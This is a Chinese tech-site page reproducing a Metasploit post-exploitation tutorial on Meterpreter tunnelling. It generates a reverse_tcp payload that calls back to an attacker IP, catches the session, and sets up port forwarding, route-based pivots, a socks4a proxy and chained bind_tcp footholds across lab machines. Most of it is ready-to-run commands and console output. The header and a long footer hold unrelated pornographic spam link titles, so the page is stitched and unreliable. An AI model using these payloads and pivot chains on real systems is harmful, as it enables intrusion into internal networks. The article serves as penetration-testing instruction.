精品欧美一区二区三区在线观看 _久久久久国色av免费观看性色_国产精品久久在线观看_亚洲第一综合网站_91精品又粗又猛又爽_小泽玛利亚一区二区免费_91亚洲精品国偷拍自产在线观看 _久久精品视频在线播放_美女精品久久久_欧美日韩国产成人在线

Metasploit滲透技巧:后滲透Meterpreter代理

安全 黑客攻防
Metasploit是一個免費的、可下載的滲透測試框架,通過它可以很容易地獲取、開發(fā)并對計算機軟件漏洞實施攻擊測試。它本身附帶數百個已知軟件漏洞的專業(yè)級漏洞攻擊測試工具。

Metasploit是一個免費的、可下載的滲透測試框架,通過它可以很容易地獲取、開發(fā)并對計算機軟件漏洞實施攻擊測試。它本身附帶數百個已知軟件漏洞的專業(yè)級漏洞攻擊測試工具。

當H.D. Moore在2003年發(fā)布Metasploit時,計算機安全狀況也被永久性地改變了。仿佛一夜之間,任何人都可以成為黑客,每個人都可以使用攻擊工具來測試那些未打過補丁或者剛剛打過補丁的漏洞。

正是因為Metasploit團隊一直都在努力開發(fā)各種攻擊測試工具,并將它們貢獻給所有Metasploit用戶,軟件廠商再也不能推遲發(fā)布針對已公布漏洞的補丁了。

本文將科普下metasploit隧道代理的使用技巧。

0×00 獲取meterpreter

1.首先生成可執(zhí)行文件

  1. root@kali:~# msfpayload windows/meterpreter/reverse_tcp  LHOST=192.168.101.105 LPORT=444 X > meter.exe  
  2. [!] ************************************************************************  
  3. [!] *               The utility msfpayload is deprecated!                  *  
  4. [!] *              It will be removed on or about 2015-06-08               *  
  5. [!] *                   Please use msfvenom instead                        *  
  6. [!] *  Details: https://github.com/rapid7/metasploit-framework/pull/4333   *  
  7. [!] ************************************************************************  
  8. Created by msfpayload (http://www.metasploit.com).  
  9. Payload: windows/meterpreter/reverse_tcp  
  10.  Length: 281  
  11. Options: {"LHOST"=>"192.168.101.105", "LPORT"=>"444"} 

2.啟動msfconsole,監(jiān)聽反連端口

  1. root@kali:~# msfconsole  
  2. [*] Starting the Metasploit Framework console.../   
  3. Taking notes in notepad? Have Metasploit Pro track & report  
  4. your progress and findings -- learn more on http://rapid7.com/metasploit 
  5.        =[ metasploit v4.11.0-2014122301 [core:4.11.0.pre.2014122301 api:1.0.0]]  
  6. + -- --=[ 1386 exploits - 863 auxiliary - 236 post        ]  
  7. + -- --=[ 342 payloads - 37 encoders - 8 nops             ]  
  8. + -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]  
  9. msf > use exploit/multi/handler   
  10. msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp  
  11. PAYLOAD => windows/meterpreter/reverse_tcp  
  12. msf exploit(handler) > set LHOST 0.0.0.0  
  13. LHOST => 0.0.0.0  
  14. msf exploit(handler) > set LPORT 444  
  15. LPORT => 444  
  16. msf exploit(handler) > show options   
  17. Module options (exploit/multi/handler):  
  18. Name  Current Setting  Required  Description  
  19.  ----  ---------------  --------  -----------  
  20. Payload options (windows/meterpreter/reverse_tcp):  
  21.    Name      Current Setting  Required  Description  
  22.    ----      ---------------  --------  -----------  
  23.    EXITFUNC  process          yes       Exit technique (accepted: seh, thread, process, none)  
  24.    LHOST     0.0.0.0          yes       The listen address  
  25.    LPORT     444              yes       The listen port  
  26. Exploit target:  
  27.    Id  Name  
  28.    --  ----  
  29.    0   Wildcard Target  
  30. msf exploit(handler) > run   
  31. [*] Started reverse handler on 0.0.0.0:444   
  32. [*] Starting the payload handler... 

3.在xp-test1執(zhí)行meter.exe,attacker獲得meterperter

  1. msf exploit(handler) > run   
  2. [*] Started reverse handler on 0.0.0.0:444   
  3. [*] Starting the payload handler...  
  4. [*] Sending stage (770048 bytes) to 192.168.101.107  
  5. [*] Meterpreter session 1 opened (192.168.101.105:444 -> 192.168.101.107:48019) at 2015-01-11 12:49:11 +0800  
  6. meterpreter > ipconfig  
  7. Interface  1 
  8. ============  
  9. Name         : MS TCP Loopback interface  
  10. Hardware MAC : 00:00:00:00:00:00  
  11. MTU          : 1520  
  12. IPv4 Address : 127.0.0.1  
  13. Interface  2 
  14. ============  
  15. Name         : AMD PCNET Family PCI Ethernet Adapter - pencS  
  16. Hardware MAC : 00:0c:29:ed:cf:d0  
  17. MTU          : 1500  
  18. IPv4 Address : 10.1.1.128  
  19. IPv4 Netmask : 255.255.255.0 

#p#

0×01 meterpreter基本隧道代理

好,現在已經有一個反彈回來的權限,下面介紹meterpreter隧道代理的幾種方法

1.portfwd

portfwd 是meterpreter提供的一種基本的端口轉發(fā)。porfwd可以反彈單個端口到本地,并且監(jiān)聽.使用方法如下:

  1. meterpreter > portfwd   
  2. 0 total local port forwards.  
  3. meterpreter > portfwd  -h  
  4. Usage: portfwd [-h] [add | delete | list | flush] [args]  
  5. OPTIONS:  
  6.     -L <opt>  The local host to listen on (optional).  
  7.     -h        Help banner.  
  8.     -l <opt>  The local port to listen on.  
  9.     -p <opt>  The remote port to connect to.  
  10.     -r <opt>  The remote host to connect to. 

使用實例介紹:

反彈10.1.1.129端口3389到本地2222并監(jiān)聽那么可以使用如下方法:

  1. meterpreter > portfwd add -l 2222 -r 10.1.1.129 -p 3389  
  2. [*] Local TCP relay created: 0.0.0.0:2222 <-> 10.1.1.129:3389  
  3. meterpreter > portfwd   
  4. 0: 0.0.0.0:2222 -> 10.1.1.129:3389  
  5. 1 total local port forwards. 

已經轉發(fā)成功,下面來驗證下:

  1. root@kali:~# netstat -an | grep "2222"  
  2. tcp        0      0 0.0.0.0:2222            0.0.0.0:*               LISTEN 

可以看到已經成功監(jiān)聽2222端口

接著連接本地2222端口即可連接受害機器10.1.1.129 3389端口,如下:

  1. root@kali:~# rdesktop 127.1.1.0:2222 

 

Metasploit滲透技巧:后滲透Meterpreter代理

 

可以看到,已經成功連接到10.1.1.129 的3389端口#p#

2. pivot

pivot是meterpreter最常用的一種代理,可以輕松把你的機器代理到受害者內網環(huán)境,下面介紹下pivot的搭建和使用方法

使用方法route add 目標i或ip段 Netmask 要使用代理的會話,通過實例來說明:

在metasploit添加一個路由表,目的是訪問10.1.1.129將通過meterpreter的會話 1 來訪問:

  1. msf exploit(handler) > route add 10.1.1.129 255.255.255.255 1  
  2. [*] Route added  
  3. msf exploit(handler) > route print   
  4. Active Routing Table 
  5. ====================  
  6.    Subnet             Netmask            Gateway  
  7.    ------             -------            -------  
  8.    10.1.1.129         255.255.255.255    Session 1 

這里如果要代理10.1.1.129/24 到session 1,則可以這么寫

  1. route add 10.1.1.0 255.255.255.0 1 

到這里pivot已經配置好了,你在msf里對10.1.1.129進行掃描(db_nmap)或者訪問(psexe 模塊,ssh模塊等)將通過代理session 1這個會話來訪問。

如果想通過其他應用程序來使用這個代理怎么辦呢,這時候可以借助 metasploit socks4a提供一個監(jiān)聽隧道供其他應用程序訪問:

首先使用 socks4a并且配置,監(jiān)聽端口

  1. msf exploit(handler) > use auxiliary/server/socks4a   
  2. msf auxiliary(socks4a) > show options   
  3. Module options (auxiliary/server/socks4a):  
  4.    Name     Current Setting  Required  Description  
  5.    ----     ---------------  --------  -----------  
  6.    SRVHOST  0.0.0.0          yes       The address to listen on  
  7.    SRVPORT  1080             yes       The port to listen on.  
  8. Auxiliary action:  
  9.    Name   Description  
  10.    ----   -----------  
  11.    Proxy    
  12. msf auxiliary(socks4a) > exploit -y  
  13. [*] Auxiliary module execution completed  
  14. msf auxiliary(socks4a) >   
  15. [*] Starting the socks4a proxy server 

查看監(jiān)聽端口

  1. root@kali:~# netstat -an | grep "1080"  
  2. tcp        0      0 0.0.0.0:1080            0.0.0.0:*               LISTEN 

端口已經監(jiān)聽,接著配置 proxychains

  1. root@kali:~# vim /etc/proxychains.conf  
  2. [ProxyList]  
  3. # add proxy here ...  
  4. # meanwileroot@kali:~# netstat -an | grep "1080"  
  5. tcp        0      0 0.0.0.0:1080            0.0.0.0:*               LISTEN   
  6. # defaults set to "tor"  
  7. socks4  127.0.0.1 1080 

配置好以后看看使用 proxychains進行代理訪問,這里訪問10.1.1.129 3389端口

Metasploit滲透技巧:后滲透Meterpreter代理

可以看到已經成功訪問#p#

0×02 多級代理

1. 二級代理隧道

上面介紹了meterpreter基礎的代理方法,但是有些實際環(huán)境不能直接使用,考慮如下環(huán)境(內網機器A、B。A機器可以對外連接,但是訪問控制很嚴格,只能訪問到很少的內網機器,B機器不能對外連接,但是可以訪問到很多核心服務和機器,A、B之間可以互相訪問),如果我們想通過B機器對核心服務和機器進行掃描和訪問要怎么辦呢?

這時候我們就meterpreter的pivot組合輕松實現二級代理就可以

效果示意圖:attacker->xp-test1->xp-test2

首先接著上面,我們已經有一個xp-test1反彈回來的meterprter了,接著我們生成一個正向的執(zhí)行文件

  1. root@kali:~# msfpayload windows/meterpreter/bind_tcp  RHOST=0.0.0.0 RPORT=4444 X > Rmeter.exe  
  2. [!] ************************************************************************  
  3. [!] *               The utility msfpayload is deprecated!                  *  
  4. [!] *              It will be removed on or about 2015-06-08               *  
  5. [!] *                   Please use msfvenom instead                        *  
  6. [!] *  Details: https://github.com/rapid7/metasploit-framework/pull/4333   *  
  7. [!] ************************************************************************  
  8. Created by msfpayload (http://www.metasploit.com).  
  9. Payload: windows/meterpreter/bind_tcp  
  10.  Length: 285  
  11. Options: {"RHOST"=>"0.0.0.0", "RPORT"=>"4444"} 

生成好以后在xp-test2上面運行

接著在msf里面添加路由

  1. msf exploit(handler) > route add 10.1.1.129 255.255.255.255 2  
  2. [*] Route added  
  3. msf exploit(handler) > route  print  
  4. Active Routing Table 
  5. ====================  
  6.    Subnet             Netmask            Gateway  
  7.    ------             -------            -------  
  8.    10.1.1.129         255.255.255.255    Session 2 

連接正向 meterpreter獲取權限

  1. msf exploit(handler) > use exploit/multi/handler   
  2. msf exploit(handler) > set PAYLOAD windows//bind_tcp  
  3. PAYLOAD => windows/meterpreter/bind_tcp  
  4. msf exploit(handler) > set RHOST 10.1.1.129  
  5. RHOST => 10.1.1.129  
  6. msf exploit(handler) > show options   
  7. Module options (exploit/multi/handler):  
  8.    Name  Current Setting  Required  Description  
  9.    ----  ---------------  --------  -----------  
  10. Payload options (windows/meterpreter/bind_tcp):  
  11.    Name      Current Setting  Required  Description  
  12.    ----      ---------------  --------  -----------  
  13.    EXITFUNC  process          yes       Exit technique (accepted: seh, thread, process, none)  
  14.    LPORT     444              yes       The listen port  
  15.    RHOST     10.1.1.129       no        The target address  
  16. Exploit target:  
  17.    Id  Name  
  18.    --  ----  
  19.    0   Wildcard Target  
  20. msf exploit(handler) > set LPORT 4444  
  21. LPORT => 4444  
  22. msf exploit(handler) > show options   
  23. Module options (exploit/multi/handler):  
  24.    Name  Current Setting  Required  Description  
  25.    ----  ---------------  --------  -----------  
  26. Payload options (windows/meterpreter/bind_tcp):  
  27.    Name      Current Setting  Required  Description  
  28.    ----      ---------------  --------  -----------  
  29.    EXITFUNC  process          yes       Exit technique (accepted: seh, thread, process, none)  
  30.    LPORT     4444             yes       The listen port  
  31.    RHOST     10.1.1.129       no        The target address  
  32. Exploit target:  
  33.    Id  Name  
  34.    --  ----  
  35.    0   Wildcard Target  
  36. msf exploit(handler) > run   
  37. [*] Started bind handler  
  38. [*] Starting the payload handler...  
  39. [*] Sending stage (770048 bytes)  
  40. [*] Meterpreter session 3 opened (192.168.101.105-192.168.101.107:0 -> 10.1.1.129:4444) at 2015-01-11 13:34:37 +0800 

現在已經獲取到xp-test2的權限,注意這里是通過xp-test1 pivot代理

下面來驗證下,查看xp-test2 4444端口

  1. C:\Documents and Settings\Administrator>netstat -an | find "4444"  
  2.   TCP    10.1.1.129:4444        10.1.1.128:1051        ESTABLISHED 

是通過xp-test1進行連接的。

這時候二級代理已經搭建好了,你可以添加需要訪問的ip到路由表,通過第二層的session(session 3),就可以使用metaploit的其他模塊訪問或掃描了。#p#

2.三級或多級代理

有時候過于龐大或者復雜的內網環(huán)境,甚至需要三層或者多層代理,原理與兩層相似,通過在第二層代理的基礎上進行連接既可

示意圖:attacket->xp-test1->xp-test2->xp-test3->…..

與兩層代理類似,如下實現:

  1. msf exploit(handler) > sessions -l  
  2. Active sessions 
  3. ===============  
  4.   Id  Type                   Information                        Connection  
  5.   --  ----                   -----------                        ----------  
  6.   2   meterpreter x86/win32  XP-TEST1\Administrator @ XP-TEST1  192.168.101.105:444 -> 192.168.101.107:51205 (10.1.1.128)  
  7.   4   meterpreter x86/win32  XP-TEST2\Administrator @ XP-TEST2  192.168.101.105-192.168.101.107:0 -> 10.1.1.129:4444 (10.1.1.129)  
  8. msf exploit(handler) > route  add 10.1.1.131 4  
  9. [-] Missing arguments to route add.  
  10. msf exploit(handler) > route  add 10.1.1.131 255.255.255.255 4  
  11. [*] Route added  
  12. msf exploit(handler) > route print   
  13. Active Routing Table 
  14. ====================  
  15.    Subnet             Netmask            Gateway  
  16.    ------             -------            -------  
  17.    10.1.1.129         255.255.255.255    Session 2  
  18.    10.1.1.131         255.255.255.255    Session 4  
  19. msf exploit(handler) > set RHOST=10.1.1.131  
  20. [-] Unknown variable  
  21. Usage: set [option] [value]  
  22. Set the given option to value.  If value is omitted, print the current value.  
  23. If both are omitted, print options that are currently set.  
  24. If run from a module context, this will set the value in the module&#039;s  
  25. datastore.  Use -g to operate on the global datastore  
  26. msf exploit(handler) > set RHOST 10.1.1.131  
  27. RHOST => 10.1.1.131  
  28. msf exploit(handler) > show options   
  29. Module options (exploit/multi/handler):  
  30.    Name  Current Setting  Required  Description  
  31.    ----  ---------------  --------  -----------  
  32. Payload options (windows/meterpreter/bind_tcp):  
  33.    Name      Current Setting  Required  Description  
  34.    ----      ---------------  --------  -----------  
  35.    EXITFUNC  process          yes       Exit technique (accepted: seh, thread, process, none)  
  36.    LPORT     4444             yes       The listen port  
  37.    RHOST     10.1.1.131       no        The target address  
  38. Exploit target:  
  39.    Id  Name  
  40.    --  ----  
  41.    0   Wildcard Target  
  42. msf exploit(handler) > run   
  43. [*] Started bind handler  
  44. [*] Starting the payload handler...  
  45. [*] Sending stage (770048 bytes)  
  46. [*] Meterpreter session 5 opened (192.168.101.105-_1_-192.168.101.107:0 -> 10.1.1.131:4444) at 2015-01-11 13:45:53 +0800  
  47. meterpreter > background   
  48. [*] Backgrounding session 5...  
  49. msf exploit(handler) > sessions -l  
  50. Active sessions 
  51. ===============  
  52.   Id  Type                   Information                        Connection  
  53.   --  ----                   -----------                        ----------  
  54.   2   meterpreter x86/win32  XP-TEST1\Administrator @ XP-TEST1  192.168.101.105:444 -> 192.168.101.107:51205 (10.1.1.128)  
  55.   4   meterpreter x86/win32  XP-TEST2\Administrator @ XP-TEST2  192.168.101.105-192.168.101.107:0 -> 10.1.1.129:4444 (10.1.1.129)  
  56.   5   meterpreter x86/win32  XP-TEST3\Administrator @ XP-TEST3  192.168.101.105-_1_-192.168.101.107:0 -> 10.1.1.131:4444 (10.1.1.131)  
  57. 在xp-test3查看端口連接  
  58. C:\Documents and Settings\Administrator>netstat -an | find "4444"  
  59.   TCP    10.1.1.131:4444        10.1.1.129:1032        ESTABLISHED  
  60. 在xp-test2查看4444端口  
  61. C:\Documents and Settings\Administrator>netstat -an | find "4444"  
  62.   TCP    10.1.1.129:1032        10.1.1.131:4444        ESTABLISHED  
  63.   TCP    10.1.1.129:4444        10.1.1.128:1054        ESTABLISHED  
  64. 說明已經實現三級連接,即attacker->xp-test1->xp-test2->xp-test3 

0×03 總結

最后,代理級數越多,帶寬損耗和穩(wěn)定性就會下降。滲透過程中根據實際情況自由靈活的選擇和使用代理方式才能實現事半工倍的效果。

責任編輯:藍雨淚 來源: FreeBuf
相關推薦

2013-11-06 16:38:59

2014-07-01 10:09:01

2014-11-26 09:15:20

2010-12-27 09:19:23

2014-06-09 14:18:24

2018-10-21 08:14:49

2014-06-11 10:29:03

2022-09-16 10:00:31

端口服務器

2013-04-12 13:21:44

2013-04-18 17:07:36

2018-09-17 09:03:47

WindowsToken滲透

2016-03-30 09:58:16

2014-05-30 09:41:16

2016-03-22 10:14:25

域滲透滲透測試域控權限

2017-07-24 17:00:49

2016-09-09 01:14:17

2010-08-03 22:09:16

2021-07-15 10:46:21

滲透測試網絡安全網絡攻擊

2022-03-08 14:23:38

APIWeb前端

2013-08-21 16:15:15

點贊
收藏

51CTO技術棧公眾號

国产精品久久久久久av| 在线精品视频一区| 懂色av一区二区夜夜嗨| 欧美成人精品激情在线观看| 日韩avxxx| 亚洲产国偷v产偷v自拍涩爱| 一区二区三区高清视频在线观看| 亚洲欧美国产一本综合首页| av无码精品一区二区三区| 欧美三级黄网| 国内精品第一页| 久久免费视频网站| 欧美大波大乳巨大乳| 日韩欧美一中文字暮专区| 国产精品第5页| 香蕉视频网站在线| 日韩精品一区第一页| 久久亚洲综合国产精品99麻豆精品福利 | 少妇人妻互换不带套| 黄色网址视频在线观看| 国产成人在线影院| 欧美与黑人午夜性猛交久久久| 一级片手机在线观看| 国产成年精品| 欧美日韩精品在线播放| 在线观看18视频网站| 少妇精品视频一区二区 | 98精品国产高清在线xxxx天堂| 亚洲性猛交xxxx乱大交| 免费精品一区| 欧美性xxxx18| 超碰人人爱人人| 国产无套粉嫩白浆在线2022年| 国产福利91精品一区| 国产精品人人做人人爽| 91成人福利视频| 人人精品视频| 欧美一区二区三区免费在线看| 国产黄色一级网站| 26uuu亚洲电影在线观看| 久久久国产精品午夜一区ai换脸| 成人精品一二区| 97久久人国产精品婷婷| 奇米精品一区二区三区在线观看 | 成人免费91在线看| 99国产揄拍国产精品| 亚洲伊人网站| 欧美亚洲视频在线观看| 日韩精品视频免费看| 国产精品v亚洲精品v日韩精品| 精品国产一区二区三区久久狼5月 精品国产一区二区三区久久久狼 精品国产一区二区三区久久久 | 一本久久a久久精品vr综合 | 欧美精彩视频一区二区三区| 精品伦理一区二区三区| www.久久精品.com| 精品午夜久久福利影院| 国产精品最新在线观看| 午夜精品免费观看| 麻豆9191精品国产| 欧美一二三视频| jizz国产免费| 国产精品视区| 国产激情视频一区| 波多野结衣视频在线看| 免费高清在线一区| 成人有码在线播放| 精品国产青草久久久久96| 秋霞午夜av一区二区三区| 国产精品美女在线观看| 一本到在线视频| 久久97超碰色| 91欧美激情另类亚洲| av中文字幕第一页| 大陆成人av片| 久久久精品有限公司| 午夜视频在线播放| 国产三级一区二区| 一区二区免费电影| 久操视频在线免费播放| 一区二区三区色| 久久久久久av无码免费网站下载| 51av在线| 在线一区二区三区| 中文字幕 日韩 欧美| 激情五月综合婷婷| 亚洲精品理论电影| 超碰人人干人人| 综合激情一区| 欧美一区三区三区高中清蜜桃| 天堂网免费视频| 亚洲免费婷婷| 成人精品网站在线观看| 国产免费一区二区三区免费视频| 国产毛片一区二区| 国产精品国产精品国产专区蜜臀ah | 久久狠狠婷婷| 国产精品第七十二页| 波多野结衣在线观看一区| 久久国产精品99久久久久久老狼| 国产精品96久久久久久又黄又硬| 国产男女无套免费网站| 99国产精品久久久久久久久久| 日韩免费电影一区二区三区| 少妇视频在线| 欧美午夜片在线看| 美女又黄又免费的视频| 亚洲欧美tv| 免费99精品国产自在在线| 中文字幕视频网| 韩日精品视频一区| 精品无人乱码一区二区三区的优势| 成人综合影院| 五月天婷婷综合| 超碰中文字幕在线观看| 亚洲影院天堂中文av色| 欧美日韩高清在线观看| 中文字幕一区二区人妻| 97aⅴ精品视频一二三区| 亚洲精品在线免费| av观看在线| 欧美日韩精品一区二区在线播放| 少妇激情一区二区三区视频| 久久久久av| 国产精品久久久久999| 亚洲男人天堂久久| 国产婷婷精品av在线| 免费无码毛片一区二三区| 91麻豆精品国产综合久久久| 日韩精品在线免费观看视频| 激情视频在线播放| 蜜桃av噜噜一区| 欧洲精品久久| free性m.freesex欧美| 日韩午夜中文字幕| 永久免费未视频| 麻豆成人久久精品二区三区红| 久久精品99| 2021中文字幕在线| 日韩欧美国产麻豆| 亚洲精品91在线| 久久电影一区| 精品日韩电影| 午夜av不卡| 日韩电影中文字幕| 日韩人妻无码一区二区三区99 | 91精品专区| 精品久久久久久久久久国产 | 欧美日韩综合一区二区三区| 99久久久免费精品国产一区二区| 欧洲精品在线播放| 爱情电影网av一区二区| 久久伊人精品视频| av在线免费在线观看| 亚洲精选在线视频| 丰满饥渴老女人hd| 韩日欧美一区| 亚洲一区二区三区毛片| 国产美女在线观看| 欧美日韩成人一区二区| 国产麻豆视频在线观看| 久久精品盗摄| 先锋在线资源一区二区三区| 2019年精品视频自拍| 日韩中文字幕在线| 国产原创中文av| 一区二区三区免费网站| 特级黄色片视频| 欧美午夜精品| 精品国产乱码久久久久久久软件 | 精品久久久一区二区| 亚洲欧美日韩偷拍| 一区二区动漫| 日韩欧美一区二区三区久久婷婷| 成人国产精品入口免费视频| 日韩天堂在线视频| 亚洲第一视频在线| 五月婷婷激情综合| 青娱乐国产视频| 国内国产精品久久| 丰满少妇大力进入| 精品国产一区二区三区| 91精品免费视频| 国产乱码在线| 精品久久人人做人人爰| 一级片视频在线观看| 中文字幕视频一区二区三区久| 四川一级毛毛片| 国产精品一二| 中文字幕日韩精品一区二区| 亚洲一区二区三区免费| 5252色成人免费视频| jizz视频在线观看| 日韩免费在线观看| 午夜精品久久久久久久蜜桃| 亚洲日本中文字幕区| 中文字幕在线观看91| 日日夜夜一区二区| 老司机激情视频| 激情综合网五月| 爱情岛论坛亚洲入口| 欧美黑人疯狂性受xxxxx野外| 久久久精品视频成人| 青梅竹马是消防员在线| 8v天堂国产在线一区二区| 91视频免费网址| 亚洲天堂a在线| 日韩人妻一区二区三区| 国产成人精品亚洲午夜麻豆| 88av.com| 亚洲啪啪91| japanese在线视频| 国产成人精品免费视| 丁香婷婷久久久综合精品国产| 成人开心激情| 毛片精品免费在线观看| 国产女主播在线写真| 日韩免费看网站| 天干夜夜爽爽日日日日| 亚洲国产成人av网| 日韩a级片在线观看 | 污软件在线观看| 91美女视频网站| 日本少妇一级片| 亚洲美女视频在线免费观看| www.-级毛片线天内射视视| 1204国产成人精品视频| 91久久在线播放| 成人黄色免费短视频| 91精品国产高清自在线看超| 国产小视频在线观看| 欧美一级片免费看| 91在线视频在线观看| 亚洲三级电影全部在线观看高清| 日本污视频网站| 国产亚洲污的网站| 人妻av一区二区| 国产伦精品一区二区三区免费迷 | 亚洲日本成人女熟在线观看| 天堂在线视频观看| 8x福利精品第一导航| 91福利免费视频| 欧美日韩一区二区三区四区 | 欧美一级日韩一级| 国产精品无码粉嫩小泬| 色综合天天综合网天天狠天天| 精品小视频在线观看| 亚洲男帅同性gay1069| 五月天激情丁香| 中文成人av在线| 成人性生交大片免费看无遮挡aⅴ| 久久婷婷色综合| 国产肉体xxxx裸体784大胆| 国产成人亚洲综合色影视| wwwww在线观看| 成人午夜大片免费观看| 妖精视频一区二区| 国产99久久久精品| 成年人性生活视频| 激情综合色播激情啊| 超碰在线97免费| 美腿丝袜亚洲综合| 男女无套免费视频网站动漫| 亚洲区国产区| 凹凸国产熟女精品视频| 日韩av一区二区在线影视| 亚洲欧美日韩一级| 蜜臀久久久久久久| 色哟哟精品视频| 久久精品国产亚洲一区二区三区| 亚洲天堂av一区二区| 国产iv一区二区三区| 三级男人添奶爽爽爽视频| 国产福利不卡视频| 日韩一级视频在线观看| 国产精品无人区| 欧美日韩色视频| 亚洲精品乱码久久久久久黑人| 久久久久97国产| 亚洲成av人综合在线观看| 国产日产精品一区二区三区| 欧美色xxxx| 最新中文字幕第一页| 91精品福利在线一区二区三区| 狠狠躁夜夜躁av无码中文幕| 亚洲老头同性xxxxx| 麻豆视频在线免费观看| 97久久精品国产| 日韩精品专区| 亚洲综合第一页| 欧美人与拘性视交免费看| 亚洲日本精品一区| 欧美视频日韩| 五月婷婷狠狠操| 国产综合色精品一区二区三区| 日本一级大毛片a一| 91免费观看视频在线| 国产十六处破外女视频| 日韩欧美精品在线观看| 亚洲天堂自拍偷拍| 欧美一级生活片| 福利在线午夜| 欧美激情精品久久久久久大尺度| 松下纱荣子在线观看| 91久久精品一区| 欧美成人一区在线观看| 椎名由奈jux491在线播放| 国产日韩欧美一区在线| 午夜精品久久久久久久99热影院| 97久久超碰国产精品电影| 午夜爽爽爽男女免费观看| 五月婷婷久久综合| 性生活视频软件| 三级精品视频久久久久| av毛片在线看| 国产一区二区在线免费| 精品网站aaa| 日本xxx免费| 秋霞av亚洲一区二区三| 国产麻豆天美果冻无码视频| 中文字幕一区av| aaaaaa毛片| 亚洲第一精品自拍| 四虎亚洲成人| 成人在线免费观看视视频| 国产一区二区精品福利地址| 欧美a级黄色大片| 美女视频黄频大全不卡视频在线播放| 熟女人妇 成熟妇女系列视频| 99久久婷婷国产精品综合| 久久久精品91| 欧美一级夜夜爽| 成人免费网址| 国产精品入口免费视| 亚洲人成网亚洲欧洲无码| 国产欧美日韩网站| 成人一区二区三区在线观看 | 天天射天天综合网| 天天操天天爱天天爽| 97精品电影院| 亚洲天堂av片| 日韩电影大全免费观看2023年上| 波多野结衣精品| 99se婷婷在线视频观看| 99re6这里只有精品| 小泽玛利亚视频在线观看| 欧美国产日韩在线观看| 天天干,天天干| 在线精品91av| 精品无人乱码一区二区三区| 激情视频一区二区| 亚洲欧美视频一区二区三区| 免费在线观看成年人视频| 亚洲成av人片在线观看无码| 无码国产精品高潮久久99| 欧美一级黑人aaaaaaa做受| 伊人春色精品| 欧美一级黄色影院| 国产精品日韩成人| 99精品免费观看| 色综合老司机第九色激情| caoporn成人| 免费看日本毛片| 91首页免费视频| 欧美brazzers| 亚洲免费电影一区| 成人免费毛片嘿嘿连载视频…| 一本一道久久a久久精品综合 | 国产噜噜噜噜噜久久久久久久久| 精品国产一区二区三区香蕉沈先生 | 亚洲综合成人婷婷小说| 99综合视频| 3d动漫精品啪啪一区二区下载| 91久久一区二区| 久操视频在线观看| 91精品视频免费| 狠狠综合久久| 熟女俱乐部一区二区| 欧美日韩精品三区| 免费a级在线播放| 国产日韩精品在线播放| 中文字幕亚洲精品乱码| 色噜噜在线观看| 欧美精品电影在线播放| 欧美aaaaaaa| 欧美精品一区二区三区在线四季 | 日韩av免费网站| 欧美高清在线| 久久久久亚洲av无码专区首jn| 欧美色道久久88综合亚洲精品| 免费人成在线观看播放视频| 国模精品娜娜一二三区| 亚洲一区激情| 免费在线观看h片| 亚洲精品之草原avav久久| 国产精品国产亚洲精品| 每日在线更新av| 亚洲男人天堂av网| 九色视频在线播放| 国产精品初高中精品久久| 日本不卡视频在线|